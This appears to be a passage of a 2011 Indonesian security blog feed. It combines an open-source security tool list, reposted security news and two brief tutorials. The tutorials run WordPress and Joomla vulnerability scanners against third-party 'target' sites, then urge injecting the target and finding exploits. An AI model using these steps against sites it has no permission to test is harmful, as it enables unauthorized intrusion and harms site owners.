Based on ClamAV, ClamWin protects more than 600,000 PCs from viruses and malware. Note that unlike most commercial anti-virus packages, ClamWin does not offer an on-access real-time scanner; in order to scan incoming files, you'll need to save them and then run a scan manually before opening or running the files. Operating System: Windows.

9. P3Scan

Replaces Avast! Linux Edition, VirusScan Enterprise for Linux

With P3Scan, you can set up a transparent proxy server that provides anti-virus and anti-spam protection. Operating System: Linux.

Backup

10. Amanda

Replaces: Simpana Backup and Recovery , NetVault, HP StorageWorks EBS

Protecting more than 500,000 systems worldwide, Amanda lays claim to the title "most popular open source backup and recovery software in the world." In addition to the community version, it's also available in a supported enterprise edition or as an appliance. Operating System: Windows, Linux, OS X.

11. Areca Backup

Replaces: NovaBackup

Aiming for a balance between simplicity and versatility, Areca offers an easy graphical interface with many options for creating and interacting with archived files. Key features include compression, encryption, delta backup support, archive merges and more. Operating System: Windows, Linux.

12. Bacula

Replaces: Simpana Backup and Recovery , NetVault, HP StorageWorks EBS

Designed for enterprise users, Bacula backs up multiple systems across a network. Commercial support and services for the popular product are available through Bacula Systems. Operating System: Windows, Linux, OS X.

13. CloneZilla

Replaces: Norton Ghost

Created as an alternative to Ghost, Clonezilla can clone single or multiple systems very quickly. It comes in two versions: Clonezilla Live for individual systems and Clonezilla SE for massive networks. Operating System: Windows, Linux, OS X.

14. PartiMage

Replaces: Norton Ghost, NovaBackup, McAfee Online Backup, Carbonite.com

Partimage can create a complete image of your system, which is useful if you need to recover from a full system crash or if you want to configure multiple systems with exactly the same software. It can also create a recovery partition on your drive. Operating System: Linux.

15. Redo

Replaces: Norton Ghost, NovaBackup, McAfee Online Backup, Carbonite.com

Calling itself the "easiest, most complete disaster recovery solution available," Redo offers backup, restore and bare-metal recovery capabilities. Even in the most severe emergencies where you must completely replace a drive, Redo claims it can get you back up and running with all of your programs and files in just 10 minutes. Operating System: Linux.

Browsers

16. Chromium

Replaces: Microsoft Internet Explorer

The open source version of Google Chrome, Chromium tends to be faster and more secure than competing browsers. Key security features include sandboxing, automatic updates, SafeBrowsing and more. Operating System: Windows, Linux, OS X.

17. Dooble

Replaces: Microsoft Internet Explorer

Dooble's developers have created this newer browser with an eye on safety and ease of use. Unlike most other browsers, it automatically encrypts all traffic for greater privacy and security. Operating System: Windows, Linux, OS X.

18. Tor

Replaces: Microsoft Internet Explorer

Tor protects your identity by providing anonymity while you browse the Web. It's used by journalists, activists, whistle-blowers and others concerned that someone might be snooping on their online activities. Operating System: Windows, Linux, OS X.

Browser Add-Ons

19. Web Of Trust

Replaces: McAfee SiteAdvisor Plus

Downloaded more than 33 million times, this popular add-on for Firefox, Internet Explorer, Chrome, Safari or Opera lets users know when they've strayed into websites that are questionable or insecure. It utilizes user ratings to identify sites that perpetuate scams, collect personal information or include unsuitable content, and it ranks them with a green-yellow-red classification system. Operating System: Windows, Linux, OS X.

20. Password Maker

Replaces Kaspersky Password Manager, Roboform

Using the same password all the time puts you at risk, but many people do it anyways because it's so difficult to remember a lot of different passwords. This browser add-on offers a better solution for the problem by creating unique passwords for each site you visit and storing them in an encrypted file that you access with a single master password. Operating System: Windows, Linux, OS X.

Data Removal

21. BleachBit

Replaces Easy System Cleaner

This helpful utility cleans up your system to protect your privacy and improve performance. It frees up disk space by cleaning junk from more than 90 applications, erasing temporary files, deleting cache and browsing history, and "shredding" unwanted files. Operating System: Windows, Linux.

22. Eraser

Replaces BCWipe Enterprise

Like BleachBit, Eraser "shreds" deleted files so that they cannot be recovered. It helps protect sensitive information by rewriting over deleted files several times with random data. Operating System: Windows

23. Wipe

Replaces BCWipe Enterprise

Wipe offers the same functionality as Eraser, but it's for Linux instead of Windows. The site also offers a wealth of information for those interested in learning more about how file "shredding" works. Operating System: Linux.

24. Darik's Boot And Nuke

Replaces Kill Disk, BCWipe Total WipeOut

While Eraser and Wipe delete single files, DBAN securely deletes entire disks. It's very helpful when donating or disposing of an old system. Operating System: OS Independent.

Data Loss Prevention

25. OpenDLP

Replaces RSA Data Loss Prevention Suite, CheckPoint DLP Software Blade, Symantec Data Loss Prevention Product Family

OpenDLP is a "agent- and agentless-based, centrally-managed, massively distributable data loss prevention tool." It allows security or compliance managers to scan thousands of systems simultaneously via agents or perform agentless data discovery against a MySQL or Microsoft SQL server. Operating System: Windows.

26. MyDLP

Replaces RSA Data Loss Prevention Suite, CheckPoint DLP Software Blade, Symantec Data Loss Prevention Product Family

MyDLP can block credit card numbers, social security numbers, or sensitive files from being transmitted via e-mail, printers, the Web or removable devices. In addition to the free community version, it also comes in a paid enterprise version. Operating System: Windows, Linux, VMware.

Encryption

27. AxCrypt

Replaces McAfee Anti-Theft, CryptoForge

With nearly 2.5 million registered users, AxCrypt claims to be the "leading open source file encryption software for Windows." It integrates with Windows Explorer—to use it, you simply right-click to encrypt a file or double-click to decrypt. Operating System: Windows.

28. Gnu Privacy Guard

Replaces PGP Universal Gateway Email Encryption

This Gnu project is a command-line implementation of the popular OpenPGP encryption standard. It supports ElGamal, DSA, RSA, AES, 3DES, Blowfish, Twofish, CAST5, MD5, SHA-1, RIPE-MD-160 and TIGER encryption algorithms. Operating System: Linux.

29. GPG Tools

Replaces PGP Universal Gateway Email Encryption

Mac users can download this version of GPG for a more user-friendly way to encrypt e-mail and files. The website includes quite a bit of help and tutorials for new users, which make it even easier to get started using the app. Operating System: OS X.

30. GPG 4 Win

Replaces Cypherus

And this version offers GPG for Windows users, complete with a GUI. It installs quickly and easily, and it protects both files at rest and mail messages. Operating System: Windows.

31. PeaZip

Replaces WinZip

While it's really a compression utility not an encryption tool, PeaZip also offers strong encryption capabilities, which is why we included it in this section of the list. It also includes two-factor authentication capabilities and secure deletion. Operating System: Windows, Linux.

32. Crypt

Replaces McAfee Anti-Theft, CryptoForge

At just 44KB, Crypt is one of the lightest weight encryption utilities available. And because it can encrypt 3MB worth of data in just 0.7 seconds, it's also one of the fastest. However, it doesn't have a GUI, so you'll need to be comfortable with the command line in order to use it. Operating System: Windows.

33. NeoCrypt

Replaces McAfee Anti-Theft, CryptoForge

NeoCrypt supports multiple encryption algorithms, including AES, DES, Triple-DES, IDEA, RC4, RC5, CAST-128, BlowFish, SkipJack. It runs from an easy-to-use GUI, and it also integrates with the Windows Shell so that you can encrypt and decrypt files right from Windows Explorer. Operating System: Windows.

34. LUKS/CyrptSetup

Replaces PGP Whole Disk Encryption

Short for "Linux Unified Key Setup," LUKS calls itself "the standard for Linux hard disk encryption." While many of the other apps on our list encrypt files one by one, LUKS encrypts your entire drive. Operating System: Linux.

35. FreeOTFE

Replaces PGP Whole Disk Encryption

Like LUKS, this app encrypts an entire drive. With it you can create and encrypt virtual disks on your hard drive. It's also highly portable and can run from a thumb drive. Operating System: Windows.

36. TrueCrypt

Replaces PGP Whole Disk Encryption

One of the most popular open source disk encryption options, TrueCrypt boasts more than 22 million downloads. Thanks to parallelization and pipelining technology, it offers fast reads and writes 0f encrypted information. Operating System: Windows.

Secure File Transfer

37. WinSCP

Replaces CuteFTP, FTP Commander

Extremely popular, the award-winning WinSCP includes an SFTP client, SCP client, FTPS client and FTP client. It offers two different interfaces and also includes an integrated text editor. Operating System: Windows.

38. FileZilla

Replaces CuteFTP, FTP Commander

While WinSCP offers only a client version, FileZilla offers both a client version and a version that allows you to set up your own FTP server. It supports FTP, FTPS and SSH transfer protocol. Operating System: Windows, Linux, OS X.

Forensics

39. Odessa

Replaces EnCase Forensics, X-ways Forensics, AccessData Forensic Toolkit

The Open Digital Evidence Search and Seizure Architecture, aka "ODESSA," offers several different tools that for examining and reporting on digital evidence. This is an older project, but still valuable. Operating System: Windows, Linux, OS X.

40. The Sleuth Kit/AutoPsy Browser

Replaces EnCase Forensics, X-ways Forensics, AccessData Forensic Toolkit

These two apps work together: The Sleuth Kit offers command line tools for conducting digital investigations, and Autopsy Browser offers a browser-based GUI for accessing those tools. The project also now includes a Hadoop framework for large-scale data analysis. Operating System: Windows, Linux, OS X.

Gateway/Unified Threat Management Appliances

41. Endian Firewall Community

Replaces: Check Point Security Gateways, SonicWall, Symantec Web Gateway

Endian Firewall Community can turn any PC (including pretty old ones) into a gateway security appliance complete with a firewall, application-level proxies with antivirus support, virus and spam-filtering for email, Web content and a VPN. Supported versions of the software and hardware appliances are also available on the site. Operating System: Linux.

42. Untangle Lite

Replaces: Check Point Security Gateways, SonicWall, Symantec Web Gateway

Similar to Endian, Untangle Lite also helps users create their own gateway security appliances. In addition, Untangle offers commercial products, and you can download each of the individual apps included in Untangle Lite (firewall, intrusion prevention, attack blocker, etc.) separately. Operating System: Linux.

43. ClearOS

Replaces: Check Point Security Gateways, SonicWall, Symantec Web Gateway

ClearOS combines gateway security functionality with the capabilities of a small business server. It offers networking, groupware, a mail server, a Web server and more. Paid support and hardware are also available. Operating System: Linux.

Intrusion Detection

44. Open Source Tripwire

Replaces Tripwire

Standard Tripwire is now a closed source project, but the community has continued developing the open source version released in 2000. It monitors the content of files and alerts network managers when those files have changed, alerting them to possible intrusions. Operating System: Windows, Linux.

45. OSSEC

Replaces Corero IPS, < ahref="http://www.hpenterprisesecurity.com/products/hp-tippingpoint-network-security/">HP Tipping Point IPS, Sophos HIPS

In addition to file integrity checking, OSSEC also performs log analysis, policy monitoring, rootkit detection and real-time alerting to help prevent and detect intrusions into your network. It's downloaded more than 5,000 times per month and has won numerous awards. Operating System: Windows, Linux.

46. AFICK

Replaces Tripwire

AFICK, short for "Another File Integrity Checker," offers similar functionality as Tripwire. It's portable, fast and runs from a GUI or the command line. Operating System: Windows, Linux.

47. Snort

Replaces Corero IPS, < ahref="http://www.hpenterprisesecurity.com/products/hp-tippingpoint-network-security/">HP Tipping Point IPS, Sophos HIPS

With millions of downloads and more than 400,000 registered users, Snort claims to be "the most widely deployed IDS/IPS technology worldwide." Operating System: Windows, Linux OS X.

Network Firewalls

48. IPCop

Replaces Barricuda NG Firewall, Check Point Appliances

Like most of the other apps on our Firewall list, IPCop turns a PC into a Linux-based firewall to protect your network. This one is designed for home or SOHO users, and it boasts an easy-to-use Web interface. Operating System: Linux.

49. Devil-Linux

Replaces Barricuda NG Firewall, Check Point Appliances

Although it was originally designed to offer firewall and router functionality, Devil-Linux can also operate as a server for many applications, including mail hosting. Created by IT administrators for IT administrators, it boasts top-notch security and excellent customization capabilities. Operating System: Linux.

50. Turtle FireWall

Replaces Barricuda NG Firewall, Check Point Appliances

Designed to be simple and fast, Turtle allows network managers to configure it via a Web interface or by modifying XML files. The website also includes some good introductory information on the nature of firewalls. Operating System: Linux.

51. ShoreWall

Replaces Barricuda NG Firewall, Check Point Appliances

Shorewall doesn't claim to be the easiest Linux firewall to use, but it does claim to be "the most flexible and powerful." You can use it on a system functioning as a dedicated firewall, as a multi-function gateway/router/server or as a standalone GNU/Linux PC. Operating System: Linux.

Network Firewalls (continued from previous page)

52. Vuurmuur

Replaces Barricuda NG Firewall, Check Point Appliances

Vuurmuur is designed to be both simple and powerful. In addition to standard firewall capabilities, it also supports traffic shaping and offers advanced monitoring capabilities. Operating System: Linux.

53. M0n0wall

Replaces Barricuda NG Firewall

Although it was designed for embedded PCs and appliance, m0n0wall can also run on a standalone PC running FreeBSD. It requires less than 12MB of space and boots in less than 25 seconds. Operating System: FreeBSD.

54. pfSense

Replaces Barricuda NG Firewall, Check Point Appliances

This m0n0wall fork is also based on BSD, but is designed for regular computers, not embedded hardware. It's been downloaded more than 1 million times and currently runs on more than 100,000 networks, including large corporations and universities as well as small home networks. Operating System: FreeBSD.

55. Vyatta

Replaces Cisco products

The "core" Vyatta software allows users to make their own firewalls/networking appliances and routers. The company also offers paid software and hardware. Operating System: Linux.

Network Monitoring

56. Wireshark

Replaces: OmniPeek, CommView

Calling itself the "world's foremost network protocol analyzer," Wireshark makes it easy to capture and analyze network traffic. Commercial products and services related to the software are available through Riverbed Technology. Operating System: Windows, Linux, OS X.

57. TcpDump/Libpcap

Replaces: OmniPeek, CommView,

Tcpdump is a command line packet analyzer, and libpcap is a C/C++ library for network traffic capture. Working together, the two provide a good network monitoring solution, but, lacking a GUI, they are not particularly user-friendly. Operating System: Linux.

58. WinDump

Replaces: OmniPeek, CommView

Managed by Riverbed Technology (which also owns Wireshark), WinDump ports tcpdump to the Windows platform. This site also includes the WinPcap library and drivers for traffic capture. Operating System: Windows.

Password Crackers

59. OphCrack

Replaces Access Data Password Recovery Toolkit, Passware

From time to time, everyone needs to recover a lost or unknown password. This password cracker uses the rainbow tables method to recover unknown passwords, and it also includes a brute force module for simple passwords. Operating System: Windows.

60. Access Data Password Recovery, Passware

John the Ripper is particularly good at cracking weak passwords, but in order to use it, you'll need a list of commonly used passwords. You can buy password lists or a pro version of the software from the same site. Operating System: Windows, Linux, OS X.

Password Management

61. KeePass Password Safe

Replaces Kaspersky Password Manager

This popular password manager stores all of your passwords in an encrypted database. You'll only need to remember one master password, while this easy-to-use, lightweight app helps protect you from identity thieves. Operating System: Windows.

62. KeePassX

Replaces Kaspersky Password Manager

If you use OS X or Linux, try this fork of KeePass. Plus, it adds a few features not in the original and runs on Windows as well. Operating System: Windows, Linux, OS X.

63. Password Safe

Replaces Kaspersky Password Manager

Downloaded more than 1 million times, Password Safe is another popular open source option for protecting your passwords. Like KeePass, it's lightweight and stores your encrypted passwords in a database so that you only need to recall one master password. Operating System: Windows.

User Authentication

64. WIKID

Replaces Entrust IdentityGuard, Vasco Digipass, RSA's SecurID

WiKID boasts "two-factor authentication without the hassle factor." In addition to the free community version, it also comes in a supported enterprise version which also adds additional functionality. Operating System: OS Independent.

Web Filtering

65. DansGuardian

Replaces McAfee Family Protection

NetNanny, CyberPatrol

This award-winning content filter uses phrase matching, PICS filtering, URL filtering and other methods to block objectionable content. Note that this software does not run on individual PCs; it runs on an OS X or Linux server to protect the rest of your network. Operating System: Linux, OS X.

=============================================================

mungkin sekian dulu dari ane, semoga bermanfaat bagi kita semua

wassalamu'alaikum wr wb

Sumber

Tutorial Wordpress Scanning

noreply@blogger.com (d'ZheNwaY) — Sun, 20 Nov 2011 11:52:00 +0700

Assalamu'alaikum dan salam sejahtera buat kita semua
ketemu agy ma ane yg newbie nie
kali ini ane akan memberikan sedikit tutor mengenai Scanning Wordpress dan

tanpa banyak bacot langsung ke topic utamanya ea

CEKIDOT !!!

1. Download software wordpress scanner disini wp-scan

==============================================================

-=- kita akan menjalankan wordpress scanner

setelah di download,, extract dulu file tersebut

buka terminal dan ketikkan command berikut ini :

cd Downloads

cd WP-SCAN

perl wp-scan.pl target.com

ex : perl wp-scan.pl www.webhostingiix.com

setelah proses scan selesai,,kalian bisa melihat hasilnya(proses nya ga nampak disana)
ntar ada report kalo udh finished, bisa dilihat hasilnya di sqli-bugs.txt di folder wp-scan tadi

selanjutnya kalian bisa melakukan penginjectkan terhadap target
===========================================================================

silahkan tunggu sampai selesai dari proses scanning

nantinya disana akan tertera mana saja yang vuln

setelah selesai semuanya,,kita tinggal nyari exploitnya saudara-saudara

untuk nyari exploitnya bisa cari dimana saja

sekian dulu tutor cupu dari ane

semoga bermanfaat buat kita semua

akhir kata dari ane, wassalam

nb : vba & ArRay

Tutorial Joomla Web Scanner 1.7

noreply@blogger.com (d'ZheNwaY) — Sun, 20 Nov 2011 11:38:00 +0700

Assalamu'alaikum dan salam sejahtera buat kita semua

sudah lama tidak update blog

oke langsung saja,,kali ini ane akan memberikan sedikit maenan buat tmen2 semua

sesuai dengan judulnya "Joomla Web Scanner 1.7"

dengan melihat judulnya saja,pasti temen-temen sudah pada ngerti tools ini buat apa

CEKIDOT !!!

1. download dulu toolsnya Joomla-Scan

2. setelah di download mari kita extract file tersebut

3. kemudian kita akan menjalankan proses scanning target

pertama-tama kita lihat dulu command untuk tool ini

ketikkan = ./joomlascan/pl help

nantinya akan keluar seperti ini

Usage:  ./joomlascan.pl -u <joomla_url> [options]

    == Options ==

      -p <string:int>  = proxy:port

      -a               = Admin folder (default '/administration')

      -v               = Check version

      -c               = Check components

      -f               = Check firewall

      -co              = Check bugs in core (require -v)

      -cm              = Check bugs in components (require -c)

      -all             = Check all (default)

      -ot              = Output to text file

      -oh              = Output to html file

      -update          = Search for updates

      -force-update    = Force to download updates

      -about           = About joomlascan

      -version         = Print version info

      -h, -help        = This help

    == Examples ==

      To scan running joomla version and components:

         $./joomlascan.pl -u www.host.com -v -c

      To scan version and core bugs:

         $./joomlascan.pl -u www.host.com -v -co

4. saatnya beraksi dengan mengetik command berikut ini

./joomlascan.pl -u www.target.com -v -co

tunggu sampai selesai proses scanning,,ngerokok dulu mas bro

setelah selesai akan seperti ini hasilnya

mungkin segitu dulu tutor cupu dari ane

semoga bermanfaat bagi kita semua

akhir kata dari ane,,wassalam

Apple's iOS 5.0.1 is out - should you upgrade?

noreply@blogger.com (d'ZheNwaY) — Sat, 12 Nov 2011 12:55:00 +0700

Apple's latest iOS update is out.

The new version bumps iOS5 up to 5.0.1, and is Apple's first OTA update.

OTA stands for "over-the-air", and means that you can download and apply the update directly from your iDevice.
You no longer need to download the entire firmware file to your computer - including yet another copy of everything which hasn't changed in iOS - and push it to your device.
(OTA updating isn't yet mandatory. If you prefer to keep full copies of each iOS firmware distro, you can still use the download-and-install-with-iTunes method.)

According to Apple, the highlights of the 5.0.1 update are that it:
* fixes bugs affecting battery life,
* adds Multitasking Gestures for the original iPad,
* resolves bugs with Documents in the Cloud, and
* improves voice recognition for Australian users using dictation.

Strewth! That last one's a bonzer boost for blokes and sheilas everywhere! Gives an Aussie something worth lifting a tinnie to after the Baggy Green got such a big hiding from the South Africans in the cricket!

Importantly, 5.0.1 also fixes a number of security flaws, including a remote code execution (RCE) vulnerability involving font handling, found by Erling Ellingsen of Facebook. RCE means that a cybercriminal might be able to trick your device into running software without asking you, even if you're just browsing the internet.

Interestingly, Charlie Miller's recent and controversial App Store hole has also been patched. Miller showed how to write an innocent-looking App which, once approved by Apple, could fetch and run unapproved software.

Miller was unceremoniously banned from the Apple Developer scene for at least a year; there's no word from Apple, however, on whether he'll be readmitted now the hole is fixed.

Jailbreakers will be pleased to note that devices suitable for running a jailbroken iOS5 - a list which sadly still excludes the iPhone 4GS and the iPad 2 - can happily run a jailbroken iOS5.0.1.

If you are a jailbreaker, however, note that there is not yet any way to go back to iOS5.0 once you've moved on to 5.0.1.
That means that you'll never be able to use Charlie Miller's code-signing vulnerability for jailbreaking purposes in the future, for example if an iPad 2 jailbreak appears which relies on it.

And that leaves us with one question: should you update?
Some reports suggest that 5.0.1 brings with it a raft of new problems, and that the update might not, after all, fix your battery issues.

But these complaints are still anecdotal and unscientific, so if you trust Apple and you're not into jailbreaking, I'd suggest updating to 5.0.1 as soon as you conveniently can.

Ellingsen's and Miller's vulnerabilities may not have made it to Apple's highlights list, but each of these bugs on its own can be considered sufficiently important to warrant a prompt update.

Free Android antivirus software is 'useless,' says testing firm

noreply@blogger.com (d'ZheNwaY) — Sat, 12 Nov 2011 12:53:00 +0700

The malware scanners from minor players typically catch less than 10 percent of malicious software

Consumers and workers who install free Android antivirus scanners from relatively unknown developers are mostly wasting their time, an independent testing firm has found. "During our tests, we found out that the majority of free products are -- to make it short -- useless," says Andreas Marx, CEO of AV-Test. Of all the major mobile platforms, Android is at most risk for malware.

The German firm tested seven free antivirus applications for the Android platform and found that the best program detected only one-third of resident malware, and all others detected less than 6 percent. The best performer, Zoner Antivirus Free, detected 8 of 10 malicious programs during installation, while the other applications detected at most 1 of the 10 malicious programs, according to the firm's analysis (PDF).

The company tested Zrgiu's Antivirus Free, BluePoint Antivirus Free, GuardX Antivirus, Kinetoo Malware Scan, LabMSF Antivirus beta, Privateer Lite, and Zoner AntiVirus Free. Four of the free antivirus program did not detect any of the 172 resident malicious programs used as a test base; another detected only 2. The programs also had little success in detecting malware during installation, with three of the programs detecting no malware and three others detecting a single program. Zoner Antivirus Free was the only standout of the bunch, detecting 32 percent of resident malware and 80 percent of malware during installation.

The firm compared the results to antivirus offerings from established security firms F-Secure and Kaspersky, which detected more than 50 percent of resident malware and blocked all 10 malware samples during installation.

The company plans to widen the testing for its next report to include antivirus programs from commercial vendors as well.

Anonymous and LulzSec trawl Google Code search for security holes

noreply@blogger.com (d'ZheNwaY) — Sat, 12 Nov 2011 12:50:00 +0700

Exotically named hacking tools such as Low Orbit Ion Cannon and #RefRef have garnered plenty of headlines over the last few months but a new report suggests that the world's favourite search engine might be an equally important weapon in the arsenal of cyber-criminals and hacktivists.

The report explains how a simple search on Google Code is all that's needed to uncover a wealth of information that can be used to break into websites, cloud-based services and secure networks.

Google's Code Search is a tool that makes it easy for those with technical know-how to search the vast amount of computer code that is publicly available online.

Researchers from IT security consultancy Stach & Lui report that hacking groups such as Anonymous and LulzSec are using Google Code search for a number of nefarious activities.

With a few well-crafted searches they can uncover passwords for cloud services, configuration files for Virtual Private Networks and find code that is vulnerable to common website hacking tactics such as SQL injection.

While the findings provide a much-needed wake up call to online businesses, admins and developers, they also offer a fascinating insight into the motivation of hacking collectives such as Anonymous and LulzSec.

According to Stach & Lui ‘Google Hacking’, as the technique is known, is believed to be Anonymous and LulzSec’s primary means of identifying potential targets.
Rather than being motivated by politics or injustice, hacking groups may simply be targeting organisations because Google Code search has turned up a vulnerability too tempting to ignore, making them less political action groups, more malicious 21st century Wombles.

So what can online businesses do to protect themselves from these online, evil Uncle Bulgarias?

The first line of defence is to make sure that developers are following established best practice and that executives are creating a culture where best practice is encouraged and supported. Including passwords in code has always been a bad idea and techniques to prevent and detect SQL injection vulnerabilities are well established.

Businesses should also prepare so that if they are successfully attacked after a data leak they don't lose their shirt. Data stored in the cloud can be rendered useless to attackers by the simple expedient of encrypting it.

Stach & Lui warn that in the businesses using cloud services should also take a close look at the small print; many cloud service providers state that they don't accept responsibility for leaks.

For more on this take a look at the Stach & Lui's Pulp Google Hacking presentation.

Adobe says goodbye to Flash for mobile platforms

noreply@blogger.com (d'ZheNwaY) — Thu, 10 Nov 2011 12:08:00 +0700

Adobe product management team has sent a briefing to Adobe's partners describing the future direction of the development for multi-platform mobile application development tools.

From the security point of view, the biggest and the most welcome news is the announcement of the end of the development of Adobe Flash player for mobile platforms, except for critical security and bug fixes.

Unfortunately, even if the death of Flash for mobile platforms is imminent, Flash for desktop platforms is still very much alive. Adobe Flash vulnerabilities, together with Java virtual machine and Adobe Reader vulnerabilities, have been the most common causes for drive-by download malware infections.

It is yet uncertain what is the future of Flash on desktop, but let us hope that the widespread acceptance of HTML5 will drive Adobe in the right direction of killing Flash players on all remaining platforms.

The move comes after a pressure by iPhone and iPad users which have been frustrated by not being able to access websites built in Flash since Apple announced its decision to exclude Flash support from iOS based devices.
Was Steve Jobs right about Flash after all?

Adobe, Apple, Microsoft & Mozilla Issue Critical Patches

noreply@blogger.com (d'ZheNwaY) — Thu, 10 Nov 2011 12:06:00 +0700

Adobe, Apple, Microsoft and Mozilla all released updates on Tuesday to fix critical security flaws in their products. Adobe issued a patch that corrects four vulnerabilities in Shockwave Player, while Redmond pushed updates to address four Windows flaws. Apple slipped out an update that mends at least 17 security holes in its version of Java, and Mozilla issued yet another major Firefox release, Firefox 8.

The only “critical” patch from Microsoft this month is a dangerous Windows flaw that could be triggered remotely to install malicious software just by sending the target system specially crafted packets of data. Microsoft says this vulnerability may be difficult to reliably exploit, but it should be patched immediately. Information on the other three flaws fixed this week is here. The fixes are available via Windows Updates for most supported versions of the operating system, including XP, Vista and Windows 7.

Adobe’s Shockwave update also fixes critical flaws, but users should check to see if they have this program installed before trying to update it. To test whether you have Shockwave installed, visit this page; if you see an animation, it’s time to update. If you see a prompt to install Shockwave, there is no need to install it. Mozilla Firefox users without Shockwave Player installed may still see “Shockwave Flash” listed in the “Plugins” directory of the browser; this merely indicates that the user has Adobe’s Flash Player installed.

The vulnerabilities fixed by this update exist in versions of Shockwave 11.6.1.629 and earlier. The latest version, v. 11.6.3.633, is available here. As I noted earlier this year, I haven’t had Shockwave on my system for some time now and don’t seem to have missed it. I’m sure it has its uses, but to me Shockwave is just another Adobe program that requires constant care and feeding. What’s more, like Adobe’s Flash Player, Shockwave demands two separate installation procedures for IE and non-IE browsers.

Hat tip to the SANS Internet Storm Center for the heads up on the Java fix from Apple. This update, available via Software Update or Apple Downloads, essentially brings Snow Leopard and Lion up to date with the Oracle patches released last month in Java 6 Update 29 (Apple maintains its own version of Java).

If you use Mozilla Firefox or Thunderbird, you may have noticed that Mozilla is pushing out another major upgrade that includes critical fixes to these programs; both have now been updated to version 8. If you’re still running Firefox version 3.6.x, Mozilla has updated that to 3.6.24 (if anyone can help decipher Mozilla’s timeline for exactly how long it will continue to support this workhorse version of Firefox, please drop a line in the comments below). Perhaps I’m becoming a curmudgeon, but I’m growing weary of the incessant update prompts from Firefox. It seems that almost every time I start it up it’s asking to restart the browser or to remove plugins that no longer work with the latest version. I’ve been gradually transitioning more of my work over to Google Chrome, which seems faster and updates the browser and any installed plugins silently (and frequently patches oft-targeted plugins like Flash Player even before Adobe officially releases the update).

Apple Bans Security Researcher Charlie Miller For Exposing iOS Exploit

noreply@blogger.com (d'ZheNwaY) — Thu, 10 Nov 2011 12:02:00 +0700

The latest wave in the infosec world is that Apple has banned the well known security researcher – Charlie Miller – from it’s developer program for exposing a new iOS exploit.

It’s not really the smartest move as I’m pretty sure anyone as smart as Charlie Miller still has plenty of options – use another person’s account, sign up another account with a different identity, hack the phone without the developer program access and so on..

Really it’s quite a harsh move from Apple and it’s not going to make them any friends in the security industry.

Apple has banned well-known security researcher Charlie Miller from its developer program, for creating an apparently benign iOS app that was actually designed to exploit a security flaw he had uncovered in the firmware.

Within hours of talking about the exploit with Forbes’ security reporter Andy Greenberg, who published the details, Miller received an email from Apple: “This letter serves as notice of termination of the iOS Developer Program License Agreement … between you and Apple. Effective immediately.”

Based on Greenberg’s follow-up story, Apple was clearly within its rights to do so. Miller created a proof-of-concept application to demonstrate the security flaw and how it could be exploited by malicious code. He then hid it inside an apparently legitimate stock ticker program, an action that, according to Apple, “violated the developer agreement that forbid[s] him to ‘hide, misrepresent or obscure’ any part of his app,” Greenberg wrote.

He quoted Miller, who works for security consultancy Acuvant, “I’m mad. I report bugs to them all the time. Being part of the developer program helps me do that. They’re hurting themselves, and making my life harder.”

In a way though, you have to agree that Miller did violate the very specific developer program agreement by hiding the PoC inside a legitimate application. That probably wasn’t his smartest idea, but then again it’s helping Apple and he’s not doing it in a malicious way to infect people – he’s doing it as a security researcher.

Apple should be more proactive on working with people like this, people who are actually fixing bugs in their products for free and improving the user experience.

It’s the way Apple operates though, secretive, exclusive, domineering etc. If you don’t do things their way, screw you.

Miller, a former National Security Agency staffer, is a well-known “white hat” hacker (he made Network World’s recent list of “Security All Stars”), with expertise in Apple’s Mac OS X and iOS platforms, including the Safari browser, and in Android. Miller “has found and reported dozens of bugs to Apple in the last few years,” Greenberg noted. Miller reported the latest one barely three weeks ago, and it was Greenberg’s public account of it yesterday, in advance of a planned public presentation by Miller next week, that got the researcher kicked out of the developer program.

The vulnerability is a fascinating exercise in information security sleuthing. Miller uncovered a flaw introduced in Apple’s restrictions on code signing on iOS devices. Code signing is a process by which only Apple-approved commands run in device memory, according to Greenberg’s account.

Miller began to suspect a flaw when Apple released iOS 4.3 in March. He realized that to boost the speed of the mobile Safari browser, Apple for the first time had allowed javascript code from a website to run at a deeper level in memory. This entailed creating a security exception, allowing the browser to run unapproved code. According to Greenberg’s story, Apple created other security restrictions to block untrusted websites from exploiting this exception, so that only the browser could make use of it.

Miller wasn’t the only one to notice that Apple had done something different with Safari in iOS 4.3, but many didn’t understand what was actually happening. Various news sites and bloggers claimed that Web apps running outside of Safari, and its new Nitro javascript engine, were slower. Some suggested that Apple was deliberately slowing them down to make Web apps less attractive than native ones.

The way in which Miller uncovered the flaw once again shows his technical brilliance – something which Apple really should be harnessing rather than turning away.

A lot of people noticed changes with iOS 4.3, but couldn’t actually figure out what was going on. Well that’s what we know in the public realm anyway, no doubt the bad guys had their eyes on it and were digging in with much more malicious exploits.

It basically seems like a way to bypass any kind of code validation by Apple and execute arbitrary code from an attack server – dangerous indeed.

Fresh Phish disguised as a PayPal Urgent Account Review Notification

noreply@blogger.com (d'ZheNwaY) — Sun, 6 Nov 2011 13:32:00 +0700

While browsing the web this evening waiting for thotcon 0x3 general admission tickets to go on sale, my wife's spidey senses were tingling when she asked me, "Is this a scam?"

Turning towards her monitor I see she has an email open inside her webmail account. The email has a pretty good sense of urgency written into it that compels the reader to follow the instructions provided and protect their information.

It begins:

"As of the 3rd of November 2011, our security system has blocked unusual charges to a credit card linked to your account."

And concludes:

"Sincerely, PayPal Account Review Team"

Unfortunately, the average person who does not read Naked Security might easily be duped of their PII (Personally Identifiable Information).

Phishing scams are nothing new. Hopefully, if people stopped falling for them, then perhaps the phishing scams might stop?
It really comes down to education and great protection (for when education fails).
The home use version of Sophos Endpoint Security and Control did a fantastic job of catching the attack as Mal/Phish-A.

The home use version is available to Sophos customer's employees. Check with your employer if the home use program is available at your organization before installing Sophos software willy nilly.

I spoke earlier in the week with a security professional who sent 500 spear phishing attacks internally to his colleagues. Of the 500 emails sent, 25 people responded by completing the form and surrendering their information.
While a 5% rate may seem small, he felt even 1% was too high. Education helped a lot, but not completely. Do you agree?
When read, this fresh phish posing as PayPal immediately puts the recipient into an emotional state that their account was compromised and their funds are in jeopardy which then clouds their judgement.

Since PayPal is a trusted name in the electronic payments industry, they of course have controls to prevent fraudulent transactions (but no one is perfect). This phish takes advantage of that trust by explaining that the breached account has been locked for your protection.

Now to regain access to your funds it's imperative to download the attachment and complete the form.

After downloading and opening the attachment it will open your web browser. As you can see, this web page looks very genuine and might lower your guard into believing it really came from PayPal.

There are a few mistakes in this poorly executed phish which caused education to prevail over emotion.

The most basic one is that there isn't a PayPal email address associated with the inbox which received this phish.

Another one to point out is that the (From: "PayPal") is really not from PayPal.
